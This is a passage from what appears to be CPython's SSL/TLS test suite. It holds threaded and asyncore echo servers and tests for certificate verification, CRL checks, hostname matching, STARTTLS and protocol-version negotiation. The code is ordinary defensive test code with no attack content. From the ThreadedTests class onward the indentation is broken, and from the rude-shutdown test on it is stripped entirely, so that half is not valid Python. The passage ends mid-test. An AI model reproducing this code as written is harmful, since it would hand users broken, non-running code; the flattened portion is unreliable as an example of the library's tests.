            except (ssl.SSLError, ConnectionResetError) as e:
                # We treat ConnectionResetError as though it were an
                # SSLError - OpenSSL on Ubuntu abruptly closes the
                # connection when asked to use an unsupported protocol.
                #
                # XXX Various errors can have happened here, for example
                # a mismatching protocol version, an invalid certificate,
                # or a low-level bug. This should be made more discriminating.
                self.server.conn_errors.append(e)
                if self.server.chatty:
                    handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
                self.running = False
                self.server.stop()
                self.close()
                return False
            else:
                if self.server.context.verify_mode == ssl.CERT_REQUIRED:
                    cert = self.sslconn.getpeercert()
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
                    cert_binary = self.sslconn.getpeercert(True)
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
                cipher = self.sslconn.cipher()
                if support.verbose and self.server.chatty:
                    sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
                    sys.stdout.write(" server: selected protocol is now "
                                     + str(self.sslconn.selected_npn_protocol()) + "\n")
                return True

        def read(self):
            # Read from whichever channel is active: TLS or plain socket.
            if self.sslconn:
                return self.sslconn.read()
            else:
                return self.sock.recv(1024)

        def write(self, bytes):
            if self.sslconn:
                return self.sslconn.write(bytes)
            else:
                return self.sock.send(bytes)

        def close(self):
            if self.sslconn:
                self.sslconn.close()
            else:
                self.sock.close()

        def run(self):
            # Main per-connection loop: dispatch on the command protocol
            # described in the class docstring.
            self.running = True
            if not self.server.starttls_server:
                if not self.wrap_conn():
                    return
            while self.running:
                try:
                    msg = self.read()
                    stripped = msg.strip()
                    if not stripped:
                        # eof, so quit this handler
                        self.running = False
                        self.close()
                    elif stripped == b'over':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: client closed connection\n")
                        self.close()
                        return
                    elif (self.server.starttls_server and
                          stripped == b'STARTTLS'):
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        if not self.wrap_conn():
                            return
                    elif (self.server.starttls_server and self.sslconn
                          and stripped == b'ENDTLS'):
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        # Drop back to the plain-text socket.
                        self.sock = self.sslconn.unwrap()
                        self.sslconn = None
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: connection is now unencrypted...\n")
                    elif stripped == b'CB tls-unique':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
                        data = self.sslconn.get_channel_binding("tls-unique")
                        self.write(repr(data).encode("us-ascii") + b"\n")
                    else:
                        if (support.verbose and
                            self.server.connectionchatty):
                            ctype = (self.sslconn and "encrypted") or "unencrypted"
                            sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
                                             % (msg, ctype, msg.lower(), ctype))
                        self.write(msg.lower())
                except OSError:
                    if self.server.chatty:
                        handle_error("Test server failure:\n")
                    self.close()
                    self.running = False
                    # normally, we'd just stop here, but for the test
                    # harness, we want to stop the server
                    self.server.stop()

    def __init__(self, certificate=None, ssl_version=None,
                 certreqs=None, cacerts=None,
                 chatty=True, connectionchatty=False, starttls_server=False,
                 npn_protocols=None, ciphers=None, context=None):
        # Either take a ready-made SSLContext, or build one from the
        # individual keyword arguments.
        if context:
            self.context = context
        else:
            self.context = ssl.SSLContext(ssl_version
                                          if ssl_version is not None
                                          else ssl.PROTOCOL_TLSv1)
            self.context.verify_mode = (certreqs if certreqs is not None
                                        else ssl.CERT_NONE)
            if cacerts:
                self.context.load_verify_locations(cacerts)
            if certificate:
                self.context.load_cert_chain(certificate)
            if npn_protocols:
                self.context.set_npn_protocols(npn_protocols)
            if ciphers:
                self.context.set_ciphers(ciphers)
        self.chatty = chatty
        self.connectionchatty = connectionchatty
        self.starttls_server = starttls_server
        self.sock = socket.socket()
        self.port = support.bind_port(self.sock)
        self.flag = None
        self.active = False
        self.selected_protocols = []
        self.conn_errors = []
        threading.Thread.__init__(self)
        self.daemon = True

    def __enter__(self):
        # Start the server thread and wait until it is accepting.
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        self.stop()
        self.join()

    def start(self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        # Accept loop; the short timeout lets us poll self.active so
        # stop() takes effect promptly.
        self.sock.settimeout(0.05)
        self.sock.listen(5)
        self.active = True
        if self.flag:
            # signal an event
            self.flag.set()
        while self.active:
            try:
                newconn, connaddr = self.sock.accept()
                if support.verbose and self.chatty:
                    sys.stdout.write(' server: new connection from '
                                     + repr(connaddr) + '\n')
                handler = self.ConnectionHandler(self, newconn, connaddr)
                handler.start()
                handler.join()
            except socket.timeout:
                pass
            except KeyboardInterrupt:
                self.stop()
        self.sock.close()

    def stop(self):
        self.active = False
class AsyncoreEchoServer(threading.Thread):
    """Echo server driven by the asyncore event loop, run in a
    background thread; lower-cases everything it receives.  Usable as a
    context manager."""

    # this one's based on asyncore.dispatcher
    class EchoServer (asyncore.dispatcher):

        class ConnectionHandler (asyncore.dispatcher_with_send):

            def __init__(self, conn, certfile):
                # Wrap the accepted socket immediately; the handshake
                # completes asynchronously in _do_ssl_handshake().
                self.socket = ssl.wrap_socket(conn, server_side=True,
                                              certfile=certfile,
                                              do_handshake_on_connect=False)
                asyncore.dispatcher_with_send.__init__(self, self.socket)
                self._ssl_accepting = True
                self._do_ssl_handshake()

            def readable(self):
                if isinstance(self.socket, ssl.SSLSocket):
                    # OpenSSL may hold already-decrypted data that
                    # select() cannot see; drain it here.
                    while self.socket.pending() > 0:
                        self.handle_read_event()
                return True

            def _do_ssl_handshake(self):
                # Advance the handshake one step; want-read/want-write
                # simply mean "try again on the next event".
                try:
                    self.socket.do_handshake()
                except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
                    return
                except ssl.SSLEOFError:
                    return self.handle_close()
                except ssl.SSLError:
                    raise
                except OSError as err:
                    if err.args[0] == errno.ECONNABORTED:
                        return self.handle_close()
                else:
                    self._ssl_accepting = False

            def handle_read(self):
                if self._ssl_accepting:
                    self._do_ssl_handshake()
                else:
                    data = self.recv(1024)
                    if support.verbose:
                        sys.stdout.write(" server: read %s from client\n" % repr(data))
                    if not data:
                        self.close()
                    else:
                        self.send(data.lower())

            def handle_close(self):
                self.close()
                if support.verbose:
                    sys.stdout.write(" server: closed connection %s\n" % self.socket)

            def handle_error(self):
                raise

        def __init__(self, certfile):
            self.certfile = certfile
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.port = support.bind_port(sock, '')
            asyncore.dispatcher.__init__(self, sock)
            self.listen(5)

        def handle_accepted(self, sock_obj, addr):
            if support.verbose:
                sys.stdout.write(" server: new connection from %s:%s\n" %addr)
            self.ConnectionHandler(sock_obj, self.certfile)

        def handle_error(self):
            raise

    def __init__(self, certfile):
        self.flag = None
        self.active = False
        self.server = self.EchoServer(certfile)
        self.port = self.server.port
        threading.Thread.__init__(self)
        self.daemon = True

    def __str__(self):
        return "<%s %s>" % (self.__class__.__name__, self.server)

    def __enter__(self):
        # Start the loop thread and wait until it is running.
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        if support.verbose:
            sys.stdout.write(" cleanup: stopping server.\n")
        self.stop()
        if support.verbose:
            sys.stdout.write(" cleanup: joining server thread.\n")
        self.join()
        if support.verbose:
            sys.stdout.write(" cleanup: successfully joined.\n")

    def start (self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        self.active = True
        if self.flag:
            self.flag.set()
        while self.active:
            # Poll in one-second slices so stop() is honoured quickly;
            # errors from a dying dispatcher are deliberately ignored.
            try:
                asyncore.loop(1)
            except:
                pass

    def stop(self):
        self.active = False
        self.server.close()
def bad_cert_test(certfile):
    """
    Launch a server with CERT_REQUIRED, and check that trying to
    connect to it with the given client certificate fails.

    The attempt must fail with ssl.SSLError or OSError (a nonexistent
    *certfile*, for instance, surfaces as OSError/ENOENT); a successful
    handshake is a test failure.
    """
    server = ThreadedEchoServer(CERTFILE,
                                certreqs=ssl.CERT_REQUIRED,
                                cacerts=CERTFILE, chatty=False,
                                connectionchatty=False)
    with server:
        try:
            with socket.socket() as sock:
                s = ssl.wrap_socket(sock,
                                    certfile=certfile,
                                    ssl_version=ssl.PROTOCOL_TLSv1)
                s.connect((HOST, server.port))
        except ssl.SSLError as x:
            if support.verbose:
                sys.stdout.write("\nSSLError is %s\n" % x.args[1])
        except OSError as x:
            # BUGFIX: there used to be two consecutive `except OSError`
            # clauses here; the second one (which re-raised when
            # x.errno != ENOENT) was unreachable because the first
            # caught every OSError, and its message contained a
            # "\OSError" typo.  Merged into a single handler that treats
            # any OSError as the expected connection failure.
            if support.verbose:
                sys.stdout.write("\nOSError is %s\n" % str(x))
        else:
            raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
                       chatty=True, connectionchatty=False, sni_name=None):
    """
    Launch a server, connect a client to it and try various reads
    and writes.

    Echoes *indata* through the server as bytes, bytearray and
    memoryview, verifying the lower-cased reply each time, then returns
    a dict of connection statistics (cipher, compression, peer cert and
    NPN protocols on both sides).
    """
    stats = {}
    server = ThreadedEchoServer(context=server_context,
                                chatty=chatty,
                                connectionchatty=False)
    with server:
        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=sni_name) as s:
            s.connect((HOST, server.port))
            # The server lower-cases whatever we send; exercise every
            # bytes-like flavour of the same payload.
            for payload in (indata, bytearray(indata), memoryview(indata)):
                if connectionchatty and support.verbose:
                    sys.stdout.write(
                        " client: sending %r...\n" % indata)
                s.write(payload)
                echoed = s.read()
                if connectionchatty and support.verbose:
                    sys.stdout.write(" client: read %r\n" % echoed)
                if echoed != indata.lower():
                    raise AssertionError(
                        "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                        % (echoed[:20], len(echoed),
                           indata[:20].lower(), len(indata)))
            # Tell the server we are done, then snapshot the session.
            s.write(b"over\n")
            if connectionchatty and support.verbose:
                sys.stdout.write(" client: closing connection.\n")
            stats.update({
                'compression': s.compression(),
                'cipher': s.cipher(),
                'peercert': s.getpeercert(),
                'client_npn_protocol': s.selected_npn_protocol()
            })
            s.close()
        stats['server_npn_protocols'] = server.selected_protocols
    return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
                       certsreqs=None, server_options=0, client_options=0):
    """
    Run a client/server handshake with the given protocol pair and
    check that it succeeds or fails exactly as *expect_success*
    predicts; any other outcome raises.
    """
    if certsreqs is None:
        certsreqs = ssl.CERT_NONE
    certtype = {
        ssl.CERT_NONE: "CERT_NONE",
        ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
        ssl.CERT_REQUIRED: "CERT_REQUIRED",
    }[certsreqs]
    if support.verbose:
        # Expected successes print as "a->b", expected failures as "{a->b}".
        formatstr = " %s->%s %s\n" if expect_success else " {%s->%s} %s\n"
        sys.stdout.write(formatstr %
                         (ssl.get_protocol_name(client_protocol),
                          ssl.get_protocol_name(server_protocol),
                          certtype))

    client_context = ssl.SSLContext(client_protocol)
    client_context.options |= client_options
    server_context = ssl.SSLContext(server_protocol)
    server_context.options |= server_options

    # NOTE: we must enable "ALL" ciphers on the client, otherwise an
    # SSLv23 client will send an SSLv3 hello (rather than SSLv2)
    # starting from OpenSSL 1.0.0 (see issue #8322).
    if client_context.protocol == ssl.PROTOCOL_SSLv23:
        client_context.set_ciphers("ALL")

    # Both sides share the same verification mode and certificates.
    for ctx in (client_context, server_context):
        ctx.verify_mode = certsreqs
        ctx.load_cert_chain(CERTFILE)
        ctx.load_verify_locations(CERTFILE)

    try:
        server_params_test(client_context, server_context,
                           chatty=False, connectionchatty=False)
    # Protocol mismatch can result in either an SSLError, or a
    # "Connection reset by peer" error.
    except ssl.SSLError:
        if expect_success:
            raise
    except OSError as e:
        if expect_success or e.errno != errno.ECONNRESET:
            raise
    else:
        if not expect_success:
            raise AssertionError(
                "Client protocol %s succeeded with server protocol %s!"
                % (ssl.get_protocol_name(client_protocol),
                   ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
    """Basic test of an SSL client connecting to a server"""
    if support.verbose:
        sys.stdout.write("\n")
    # One round-trip per supported protocol, with client and server
    # sharing the same context/certificate.
    for proto in PROTOCOLS:
        with self.subTest(protocol=ssl._PROTOCOL_NAMES[proto]):
            ctx = ssl.SSLContext(proto)
            ctx.load_cert_chain(CERTFILE)
            server_params_test(ctx, ctx,
                               chatty=True, connectionchatty=True)
def test_getpeercert(self):
    # getpeercert() must fail before the handshake and return the full
    # (verified) peer certificate afterwards.
    if support.verbose:
        sys.stdout.write("\n")
    context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(CERTFILE)
    context.load_cert_chain(CERTFILE)
    server = ThreadedEchoServer(context=context, chatty=False)
    with server:
        s = context.wrap_socket(socket.socket(),
                                do_handshake_on_connect=False)
        s.connect((HOST, server.port))
        # getpeercert() raises ValueError while the handshake isn't
        # done.
        with self.assertRaises(ValueError):
            s.getpeercert()
        s.do_handshake()
        cert = s.getpeercert()
        self.assertTrue(cert, "Can't get peer certificate.")
        cipher = s.cipher()
        if support.verbose:
            sys.stdout.write(pprint.pformat(cert) + '\n')
            sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
        if 'subject' not in cert:
            self.fail("No subject field in certificate: %s." %
                      pprint.pformat(cert))
        if ((('organizationName', 'Python Software Foundation'),)
            not in cert['subject']):
            self.fail(
                "Missing or invalid 'organizationName' field in certificate subject; "
                "should be 'Python Software Foundation'.")
        # The validity interval must be well-formed (notBefore < notAfter).
        self.assertIn('notBefore', cert)
        self.assertIn('notAfter', cert)
        before = ssl.cert_time_to_seconds(cert['notBefore'])
        after = ssl.cert_time_to_seconds(cert['notAfter'])
        self.assertLess(before, after)
        s.close()
@unittest.skipUnless(have_verify_flags(),
                     "verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
    """Certificate revocation: VERIFY_DEFAULT ignores CRLs, while
    VERIFY_CRL_CHECK_LEAF fails until a CRL file is actually loaded."""
    if support.verbose:
        sys.stdout.write("\n")

    server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    server_context.load_cert_chain(SIGNED_CERTFILE)

    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(SIGNING_CA)
    # Some OpenSSL builds set VERIFY_X509_TRUSTED_FIRST by default.
    tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
    self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)

    def connect_ok():
        # Run one client/server session that must succeed and hand us
        # a peer certificate.
        with ThreadedEchoServer(context=server_context, chatty=True) as server:
            with context.wrap_socket(socket.socket()) as s:
                s.connect((HOST, server.port))
                cert = s.getpeercert()
                self.assertTrue(cert, "Can't get peer certificate.")

    # VERIFY_DEFAULT should pass
    connect_ok()

    # VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
    context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
    with ThreadedEchoServer(context=server_context, chatty=True) as server:
        with context.wrap_socket(socket.socket()) as s:
            with self.assertRaisesRegex(ssl.SSLError,
                                        "certificate verify failed"):
                s.connect((HOST, server.port))

    # now load a CRL file. The CRL file is signed by the CA.
    context.load_verify_locations(CRLFILE)
    connect_ok()
def test_check_hostname(self):
    """End-to-end hostname verification: a matching name passes, a
    mismatched one raises CertificateError, and wrapping without a
    server_hostname is rejected up front."""
    if support.verbose:
        sys.stdout.write("\n")

    server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    server_context.load_cert_chain(SIGNED_CERTFILE)

    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.verify_mode = ssl.CERT_REQUIRED
    context.check_hostname = True
    context.load_verify_locations(SIGNING_CA)

    # correct hostname should verify
    with ThreadedEchoServer(context=server_context, chatty=True) as server:
        with context.wrap_socket(socket.socket(),
                                 server_hostname="localhost") as s:
            s.connect((HOST, server.port))
            cert = s.getpeercert()
            self.assertTrue(cert, "Can't get peer certificate.")

    # incorrect hostname should raise an exception
    with ThreadedEchoServer(context=server_context, chatty=True) as server:
        with context.wrap_socket(socket.socket(),
                                 server_hostname="invalid") as s:
            with self.assertRaisesRegex(ssl.CertificateError,
                                        "hostname 'invalid' doesn't match 'localhost'"):
                s.connect((HOST, server.port))

    # missing server_hostname arg should cause an exception, too
    with ThreadedEchoServer(context=server_context, chatty=True) as server:
        with socket.socket() as s:
            with self.assertRaisesRegex(ValueError,
                                        "check_hostname requires server_hostname"):
                context.wrap_socket(s)
def test_empty_cert(self):
    """Connecting with an empty cert file"""
    cert_path = os.path.join(os.path.dirname(__file__) or os.curdir,
                             "nullcert.pem")
    bad_cert_test(cert_path)
def test_malformed_cert(self):
    """Connecting with a badly formatted certificate (syntax error)"""
    cert_path = os.path.join(os.path.dirname(__file__) or os.curdir,
                             "badcert.pem")
    bad_cert_test(cert_path)
def test_nonexisting_cert(self):
    """Connecting with a non-existing cert file"""
    cert_path = os.path.join(os.path.dirname(__file__) or os.curdir,
                             "wrongcert.pem")
    bad_cert_test(cert_path)
def test_malformed_key(self):
    """Connecting with a badly formatted key (syntax error)"""
    cert_path = os.path.join(os.path.dirname(__file__) or os.curdir,
                             "badkey.pem")
    bad_cert_test(cert_path)
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, True)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, True,
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
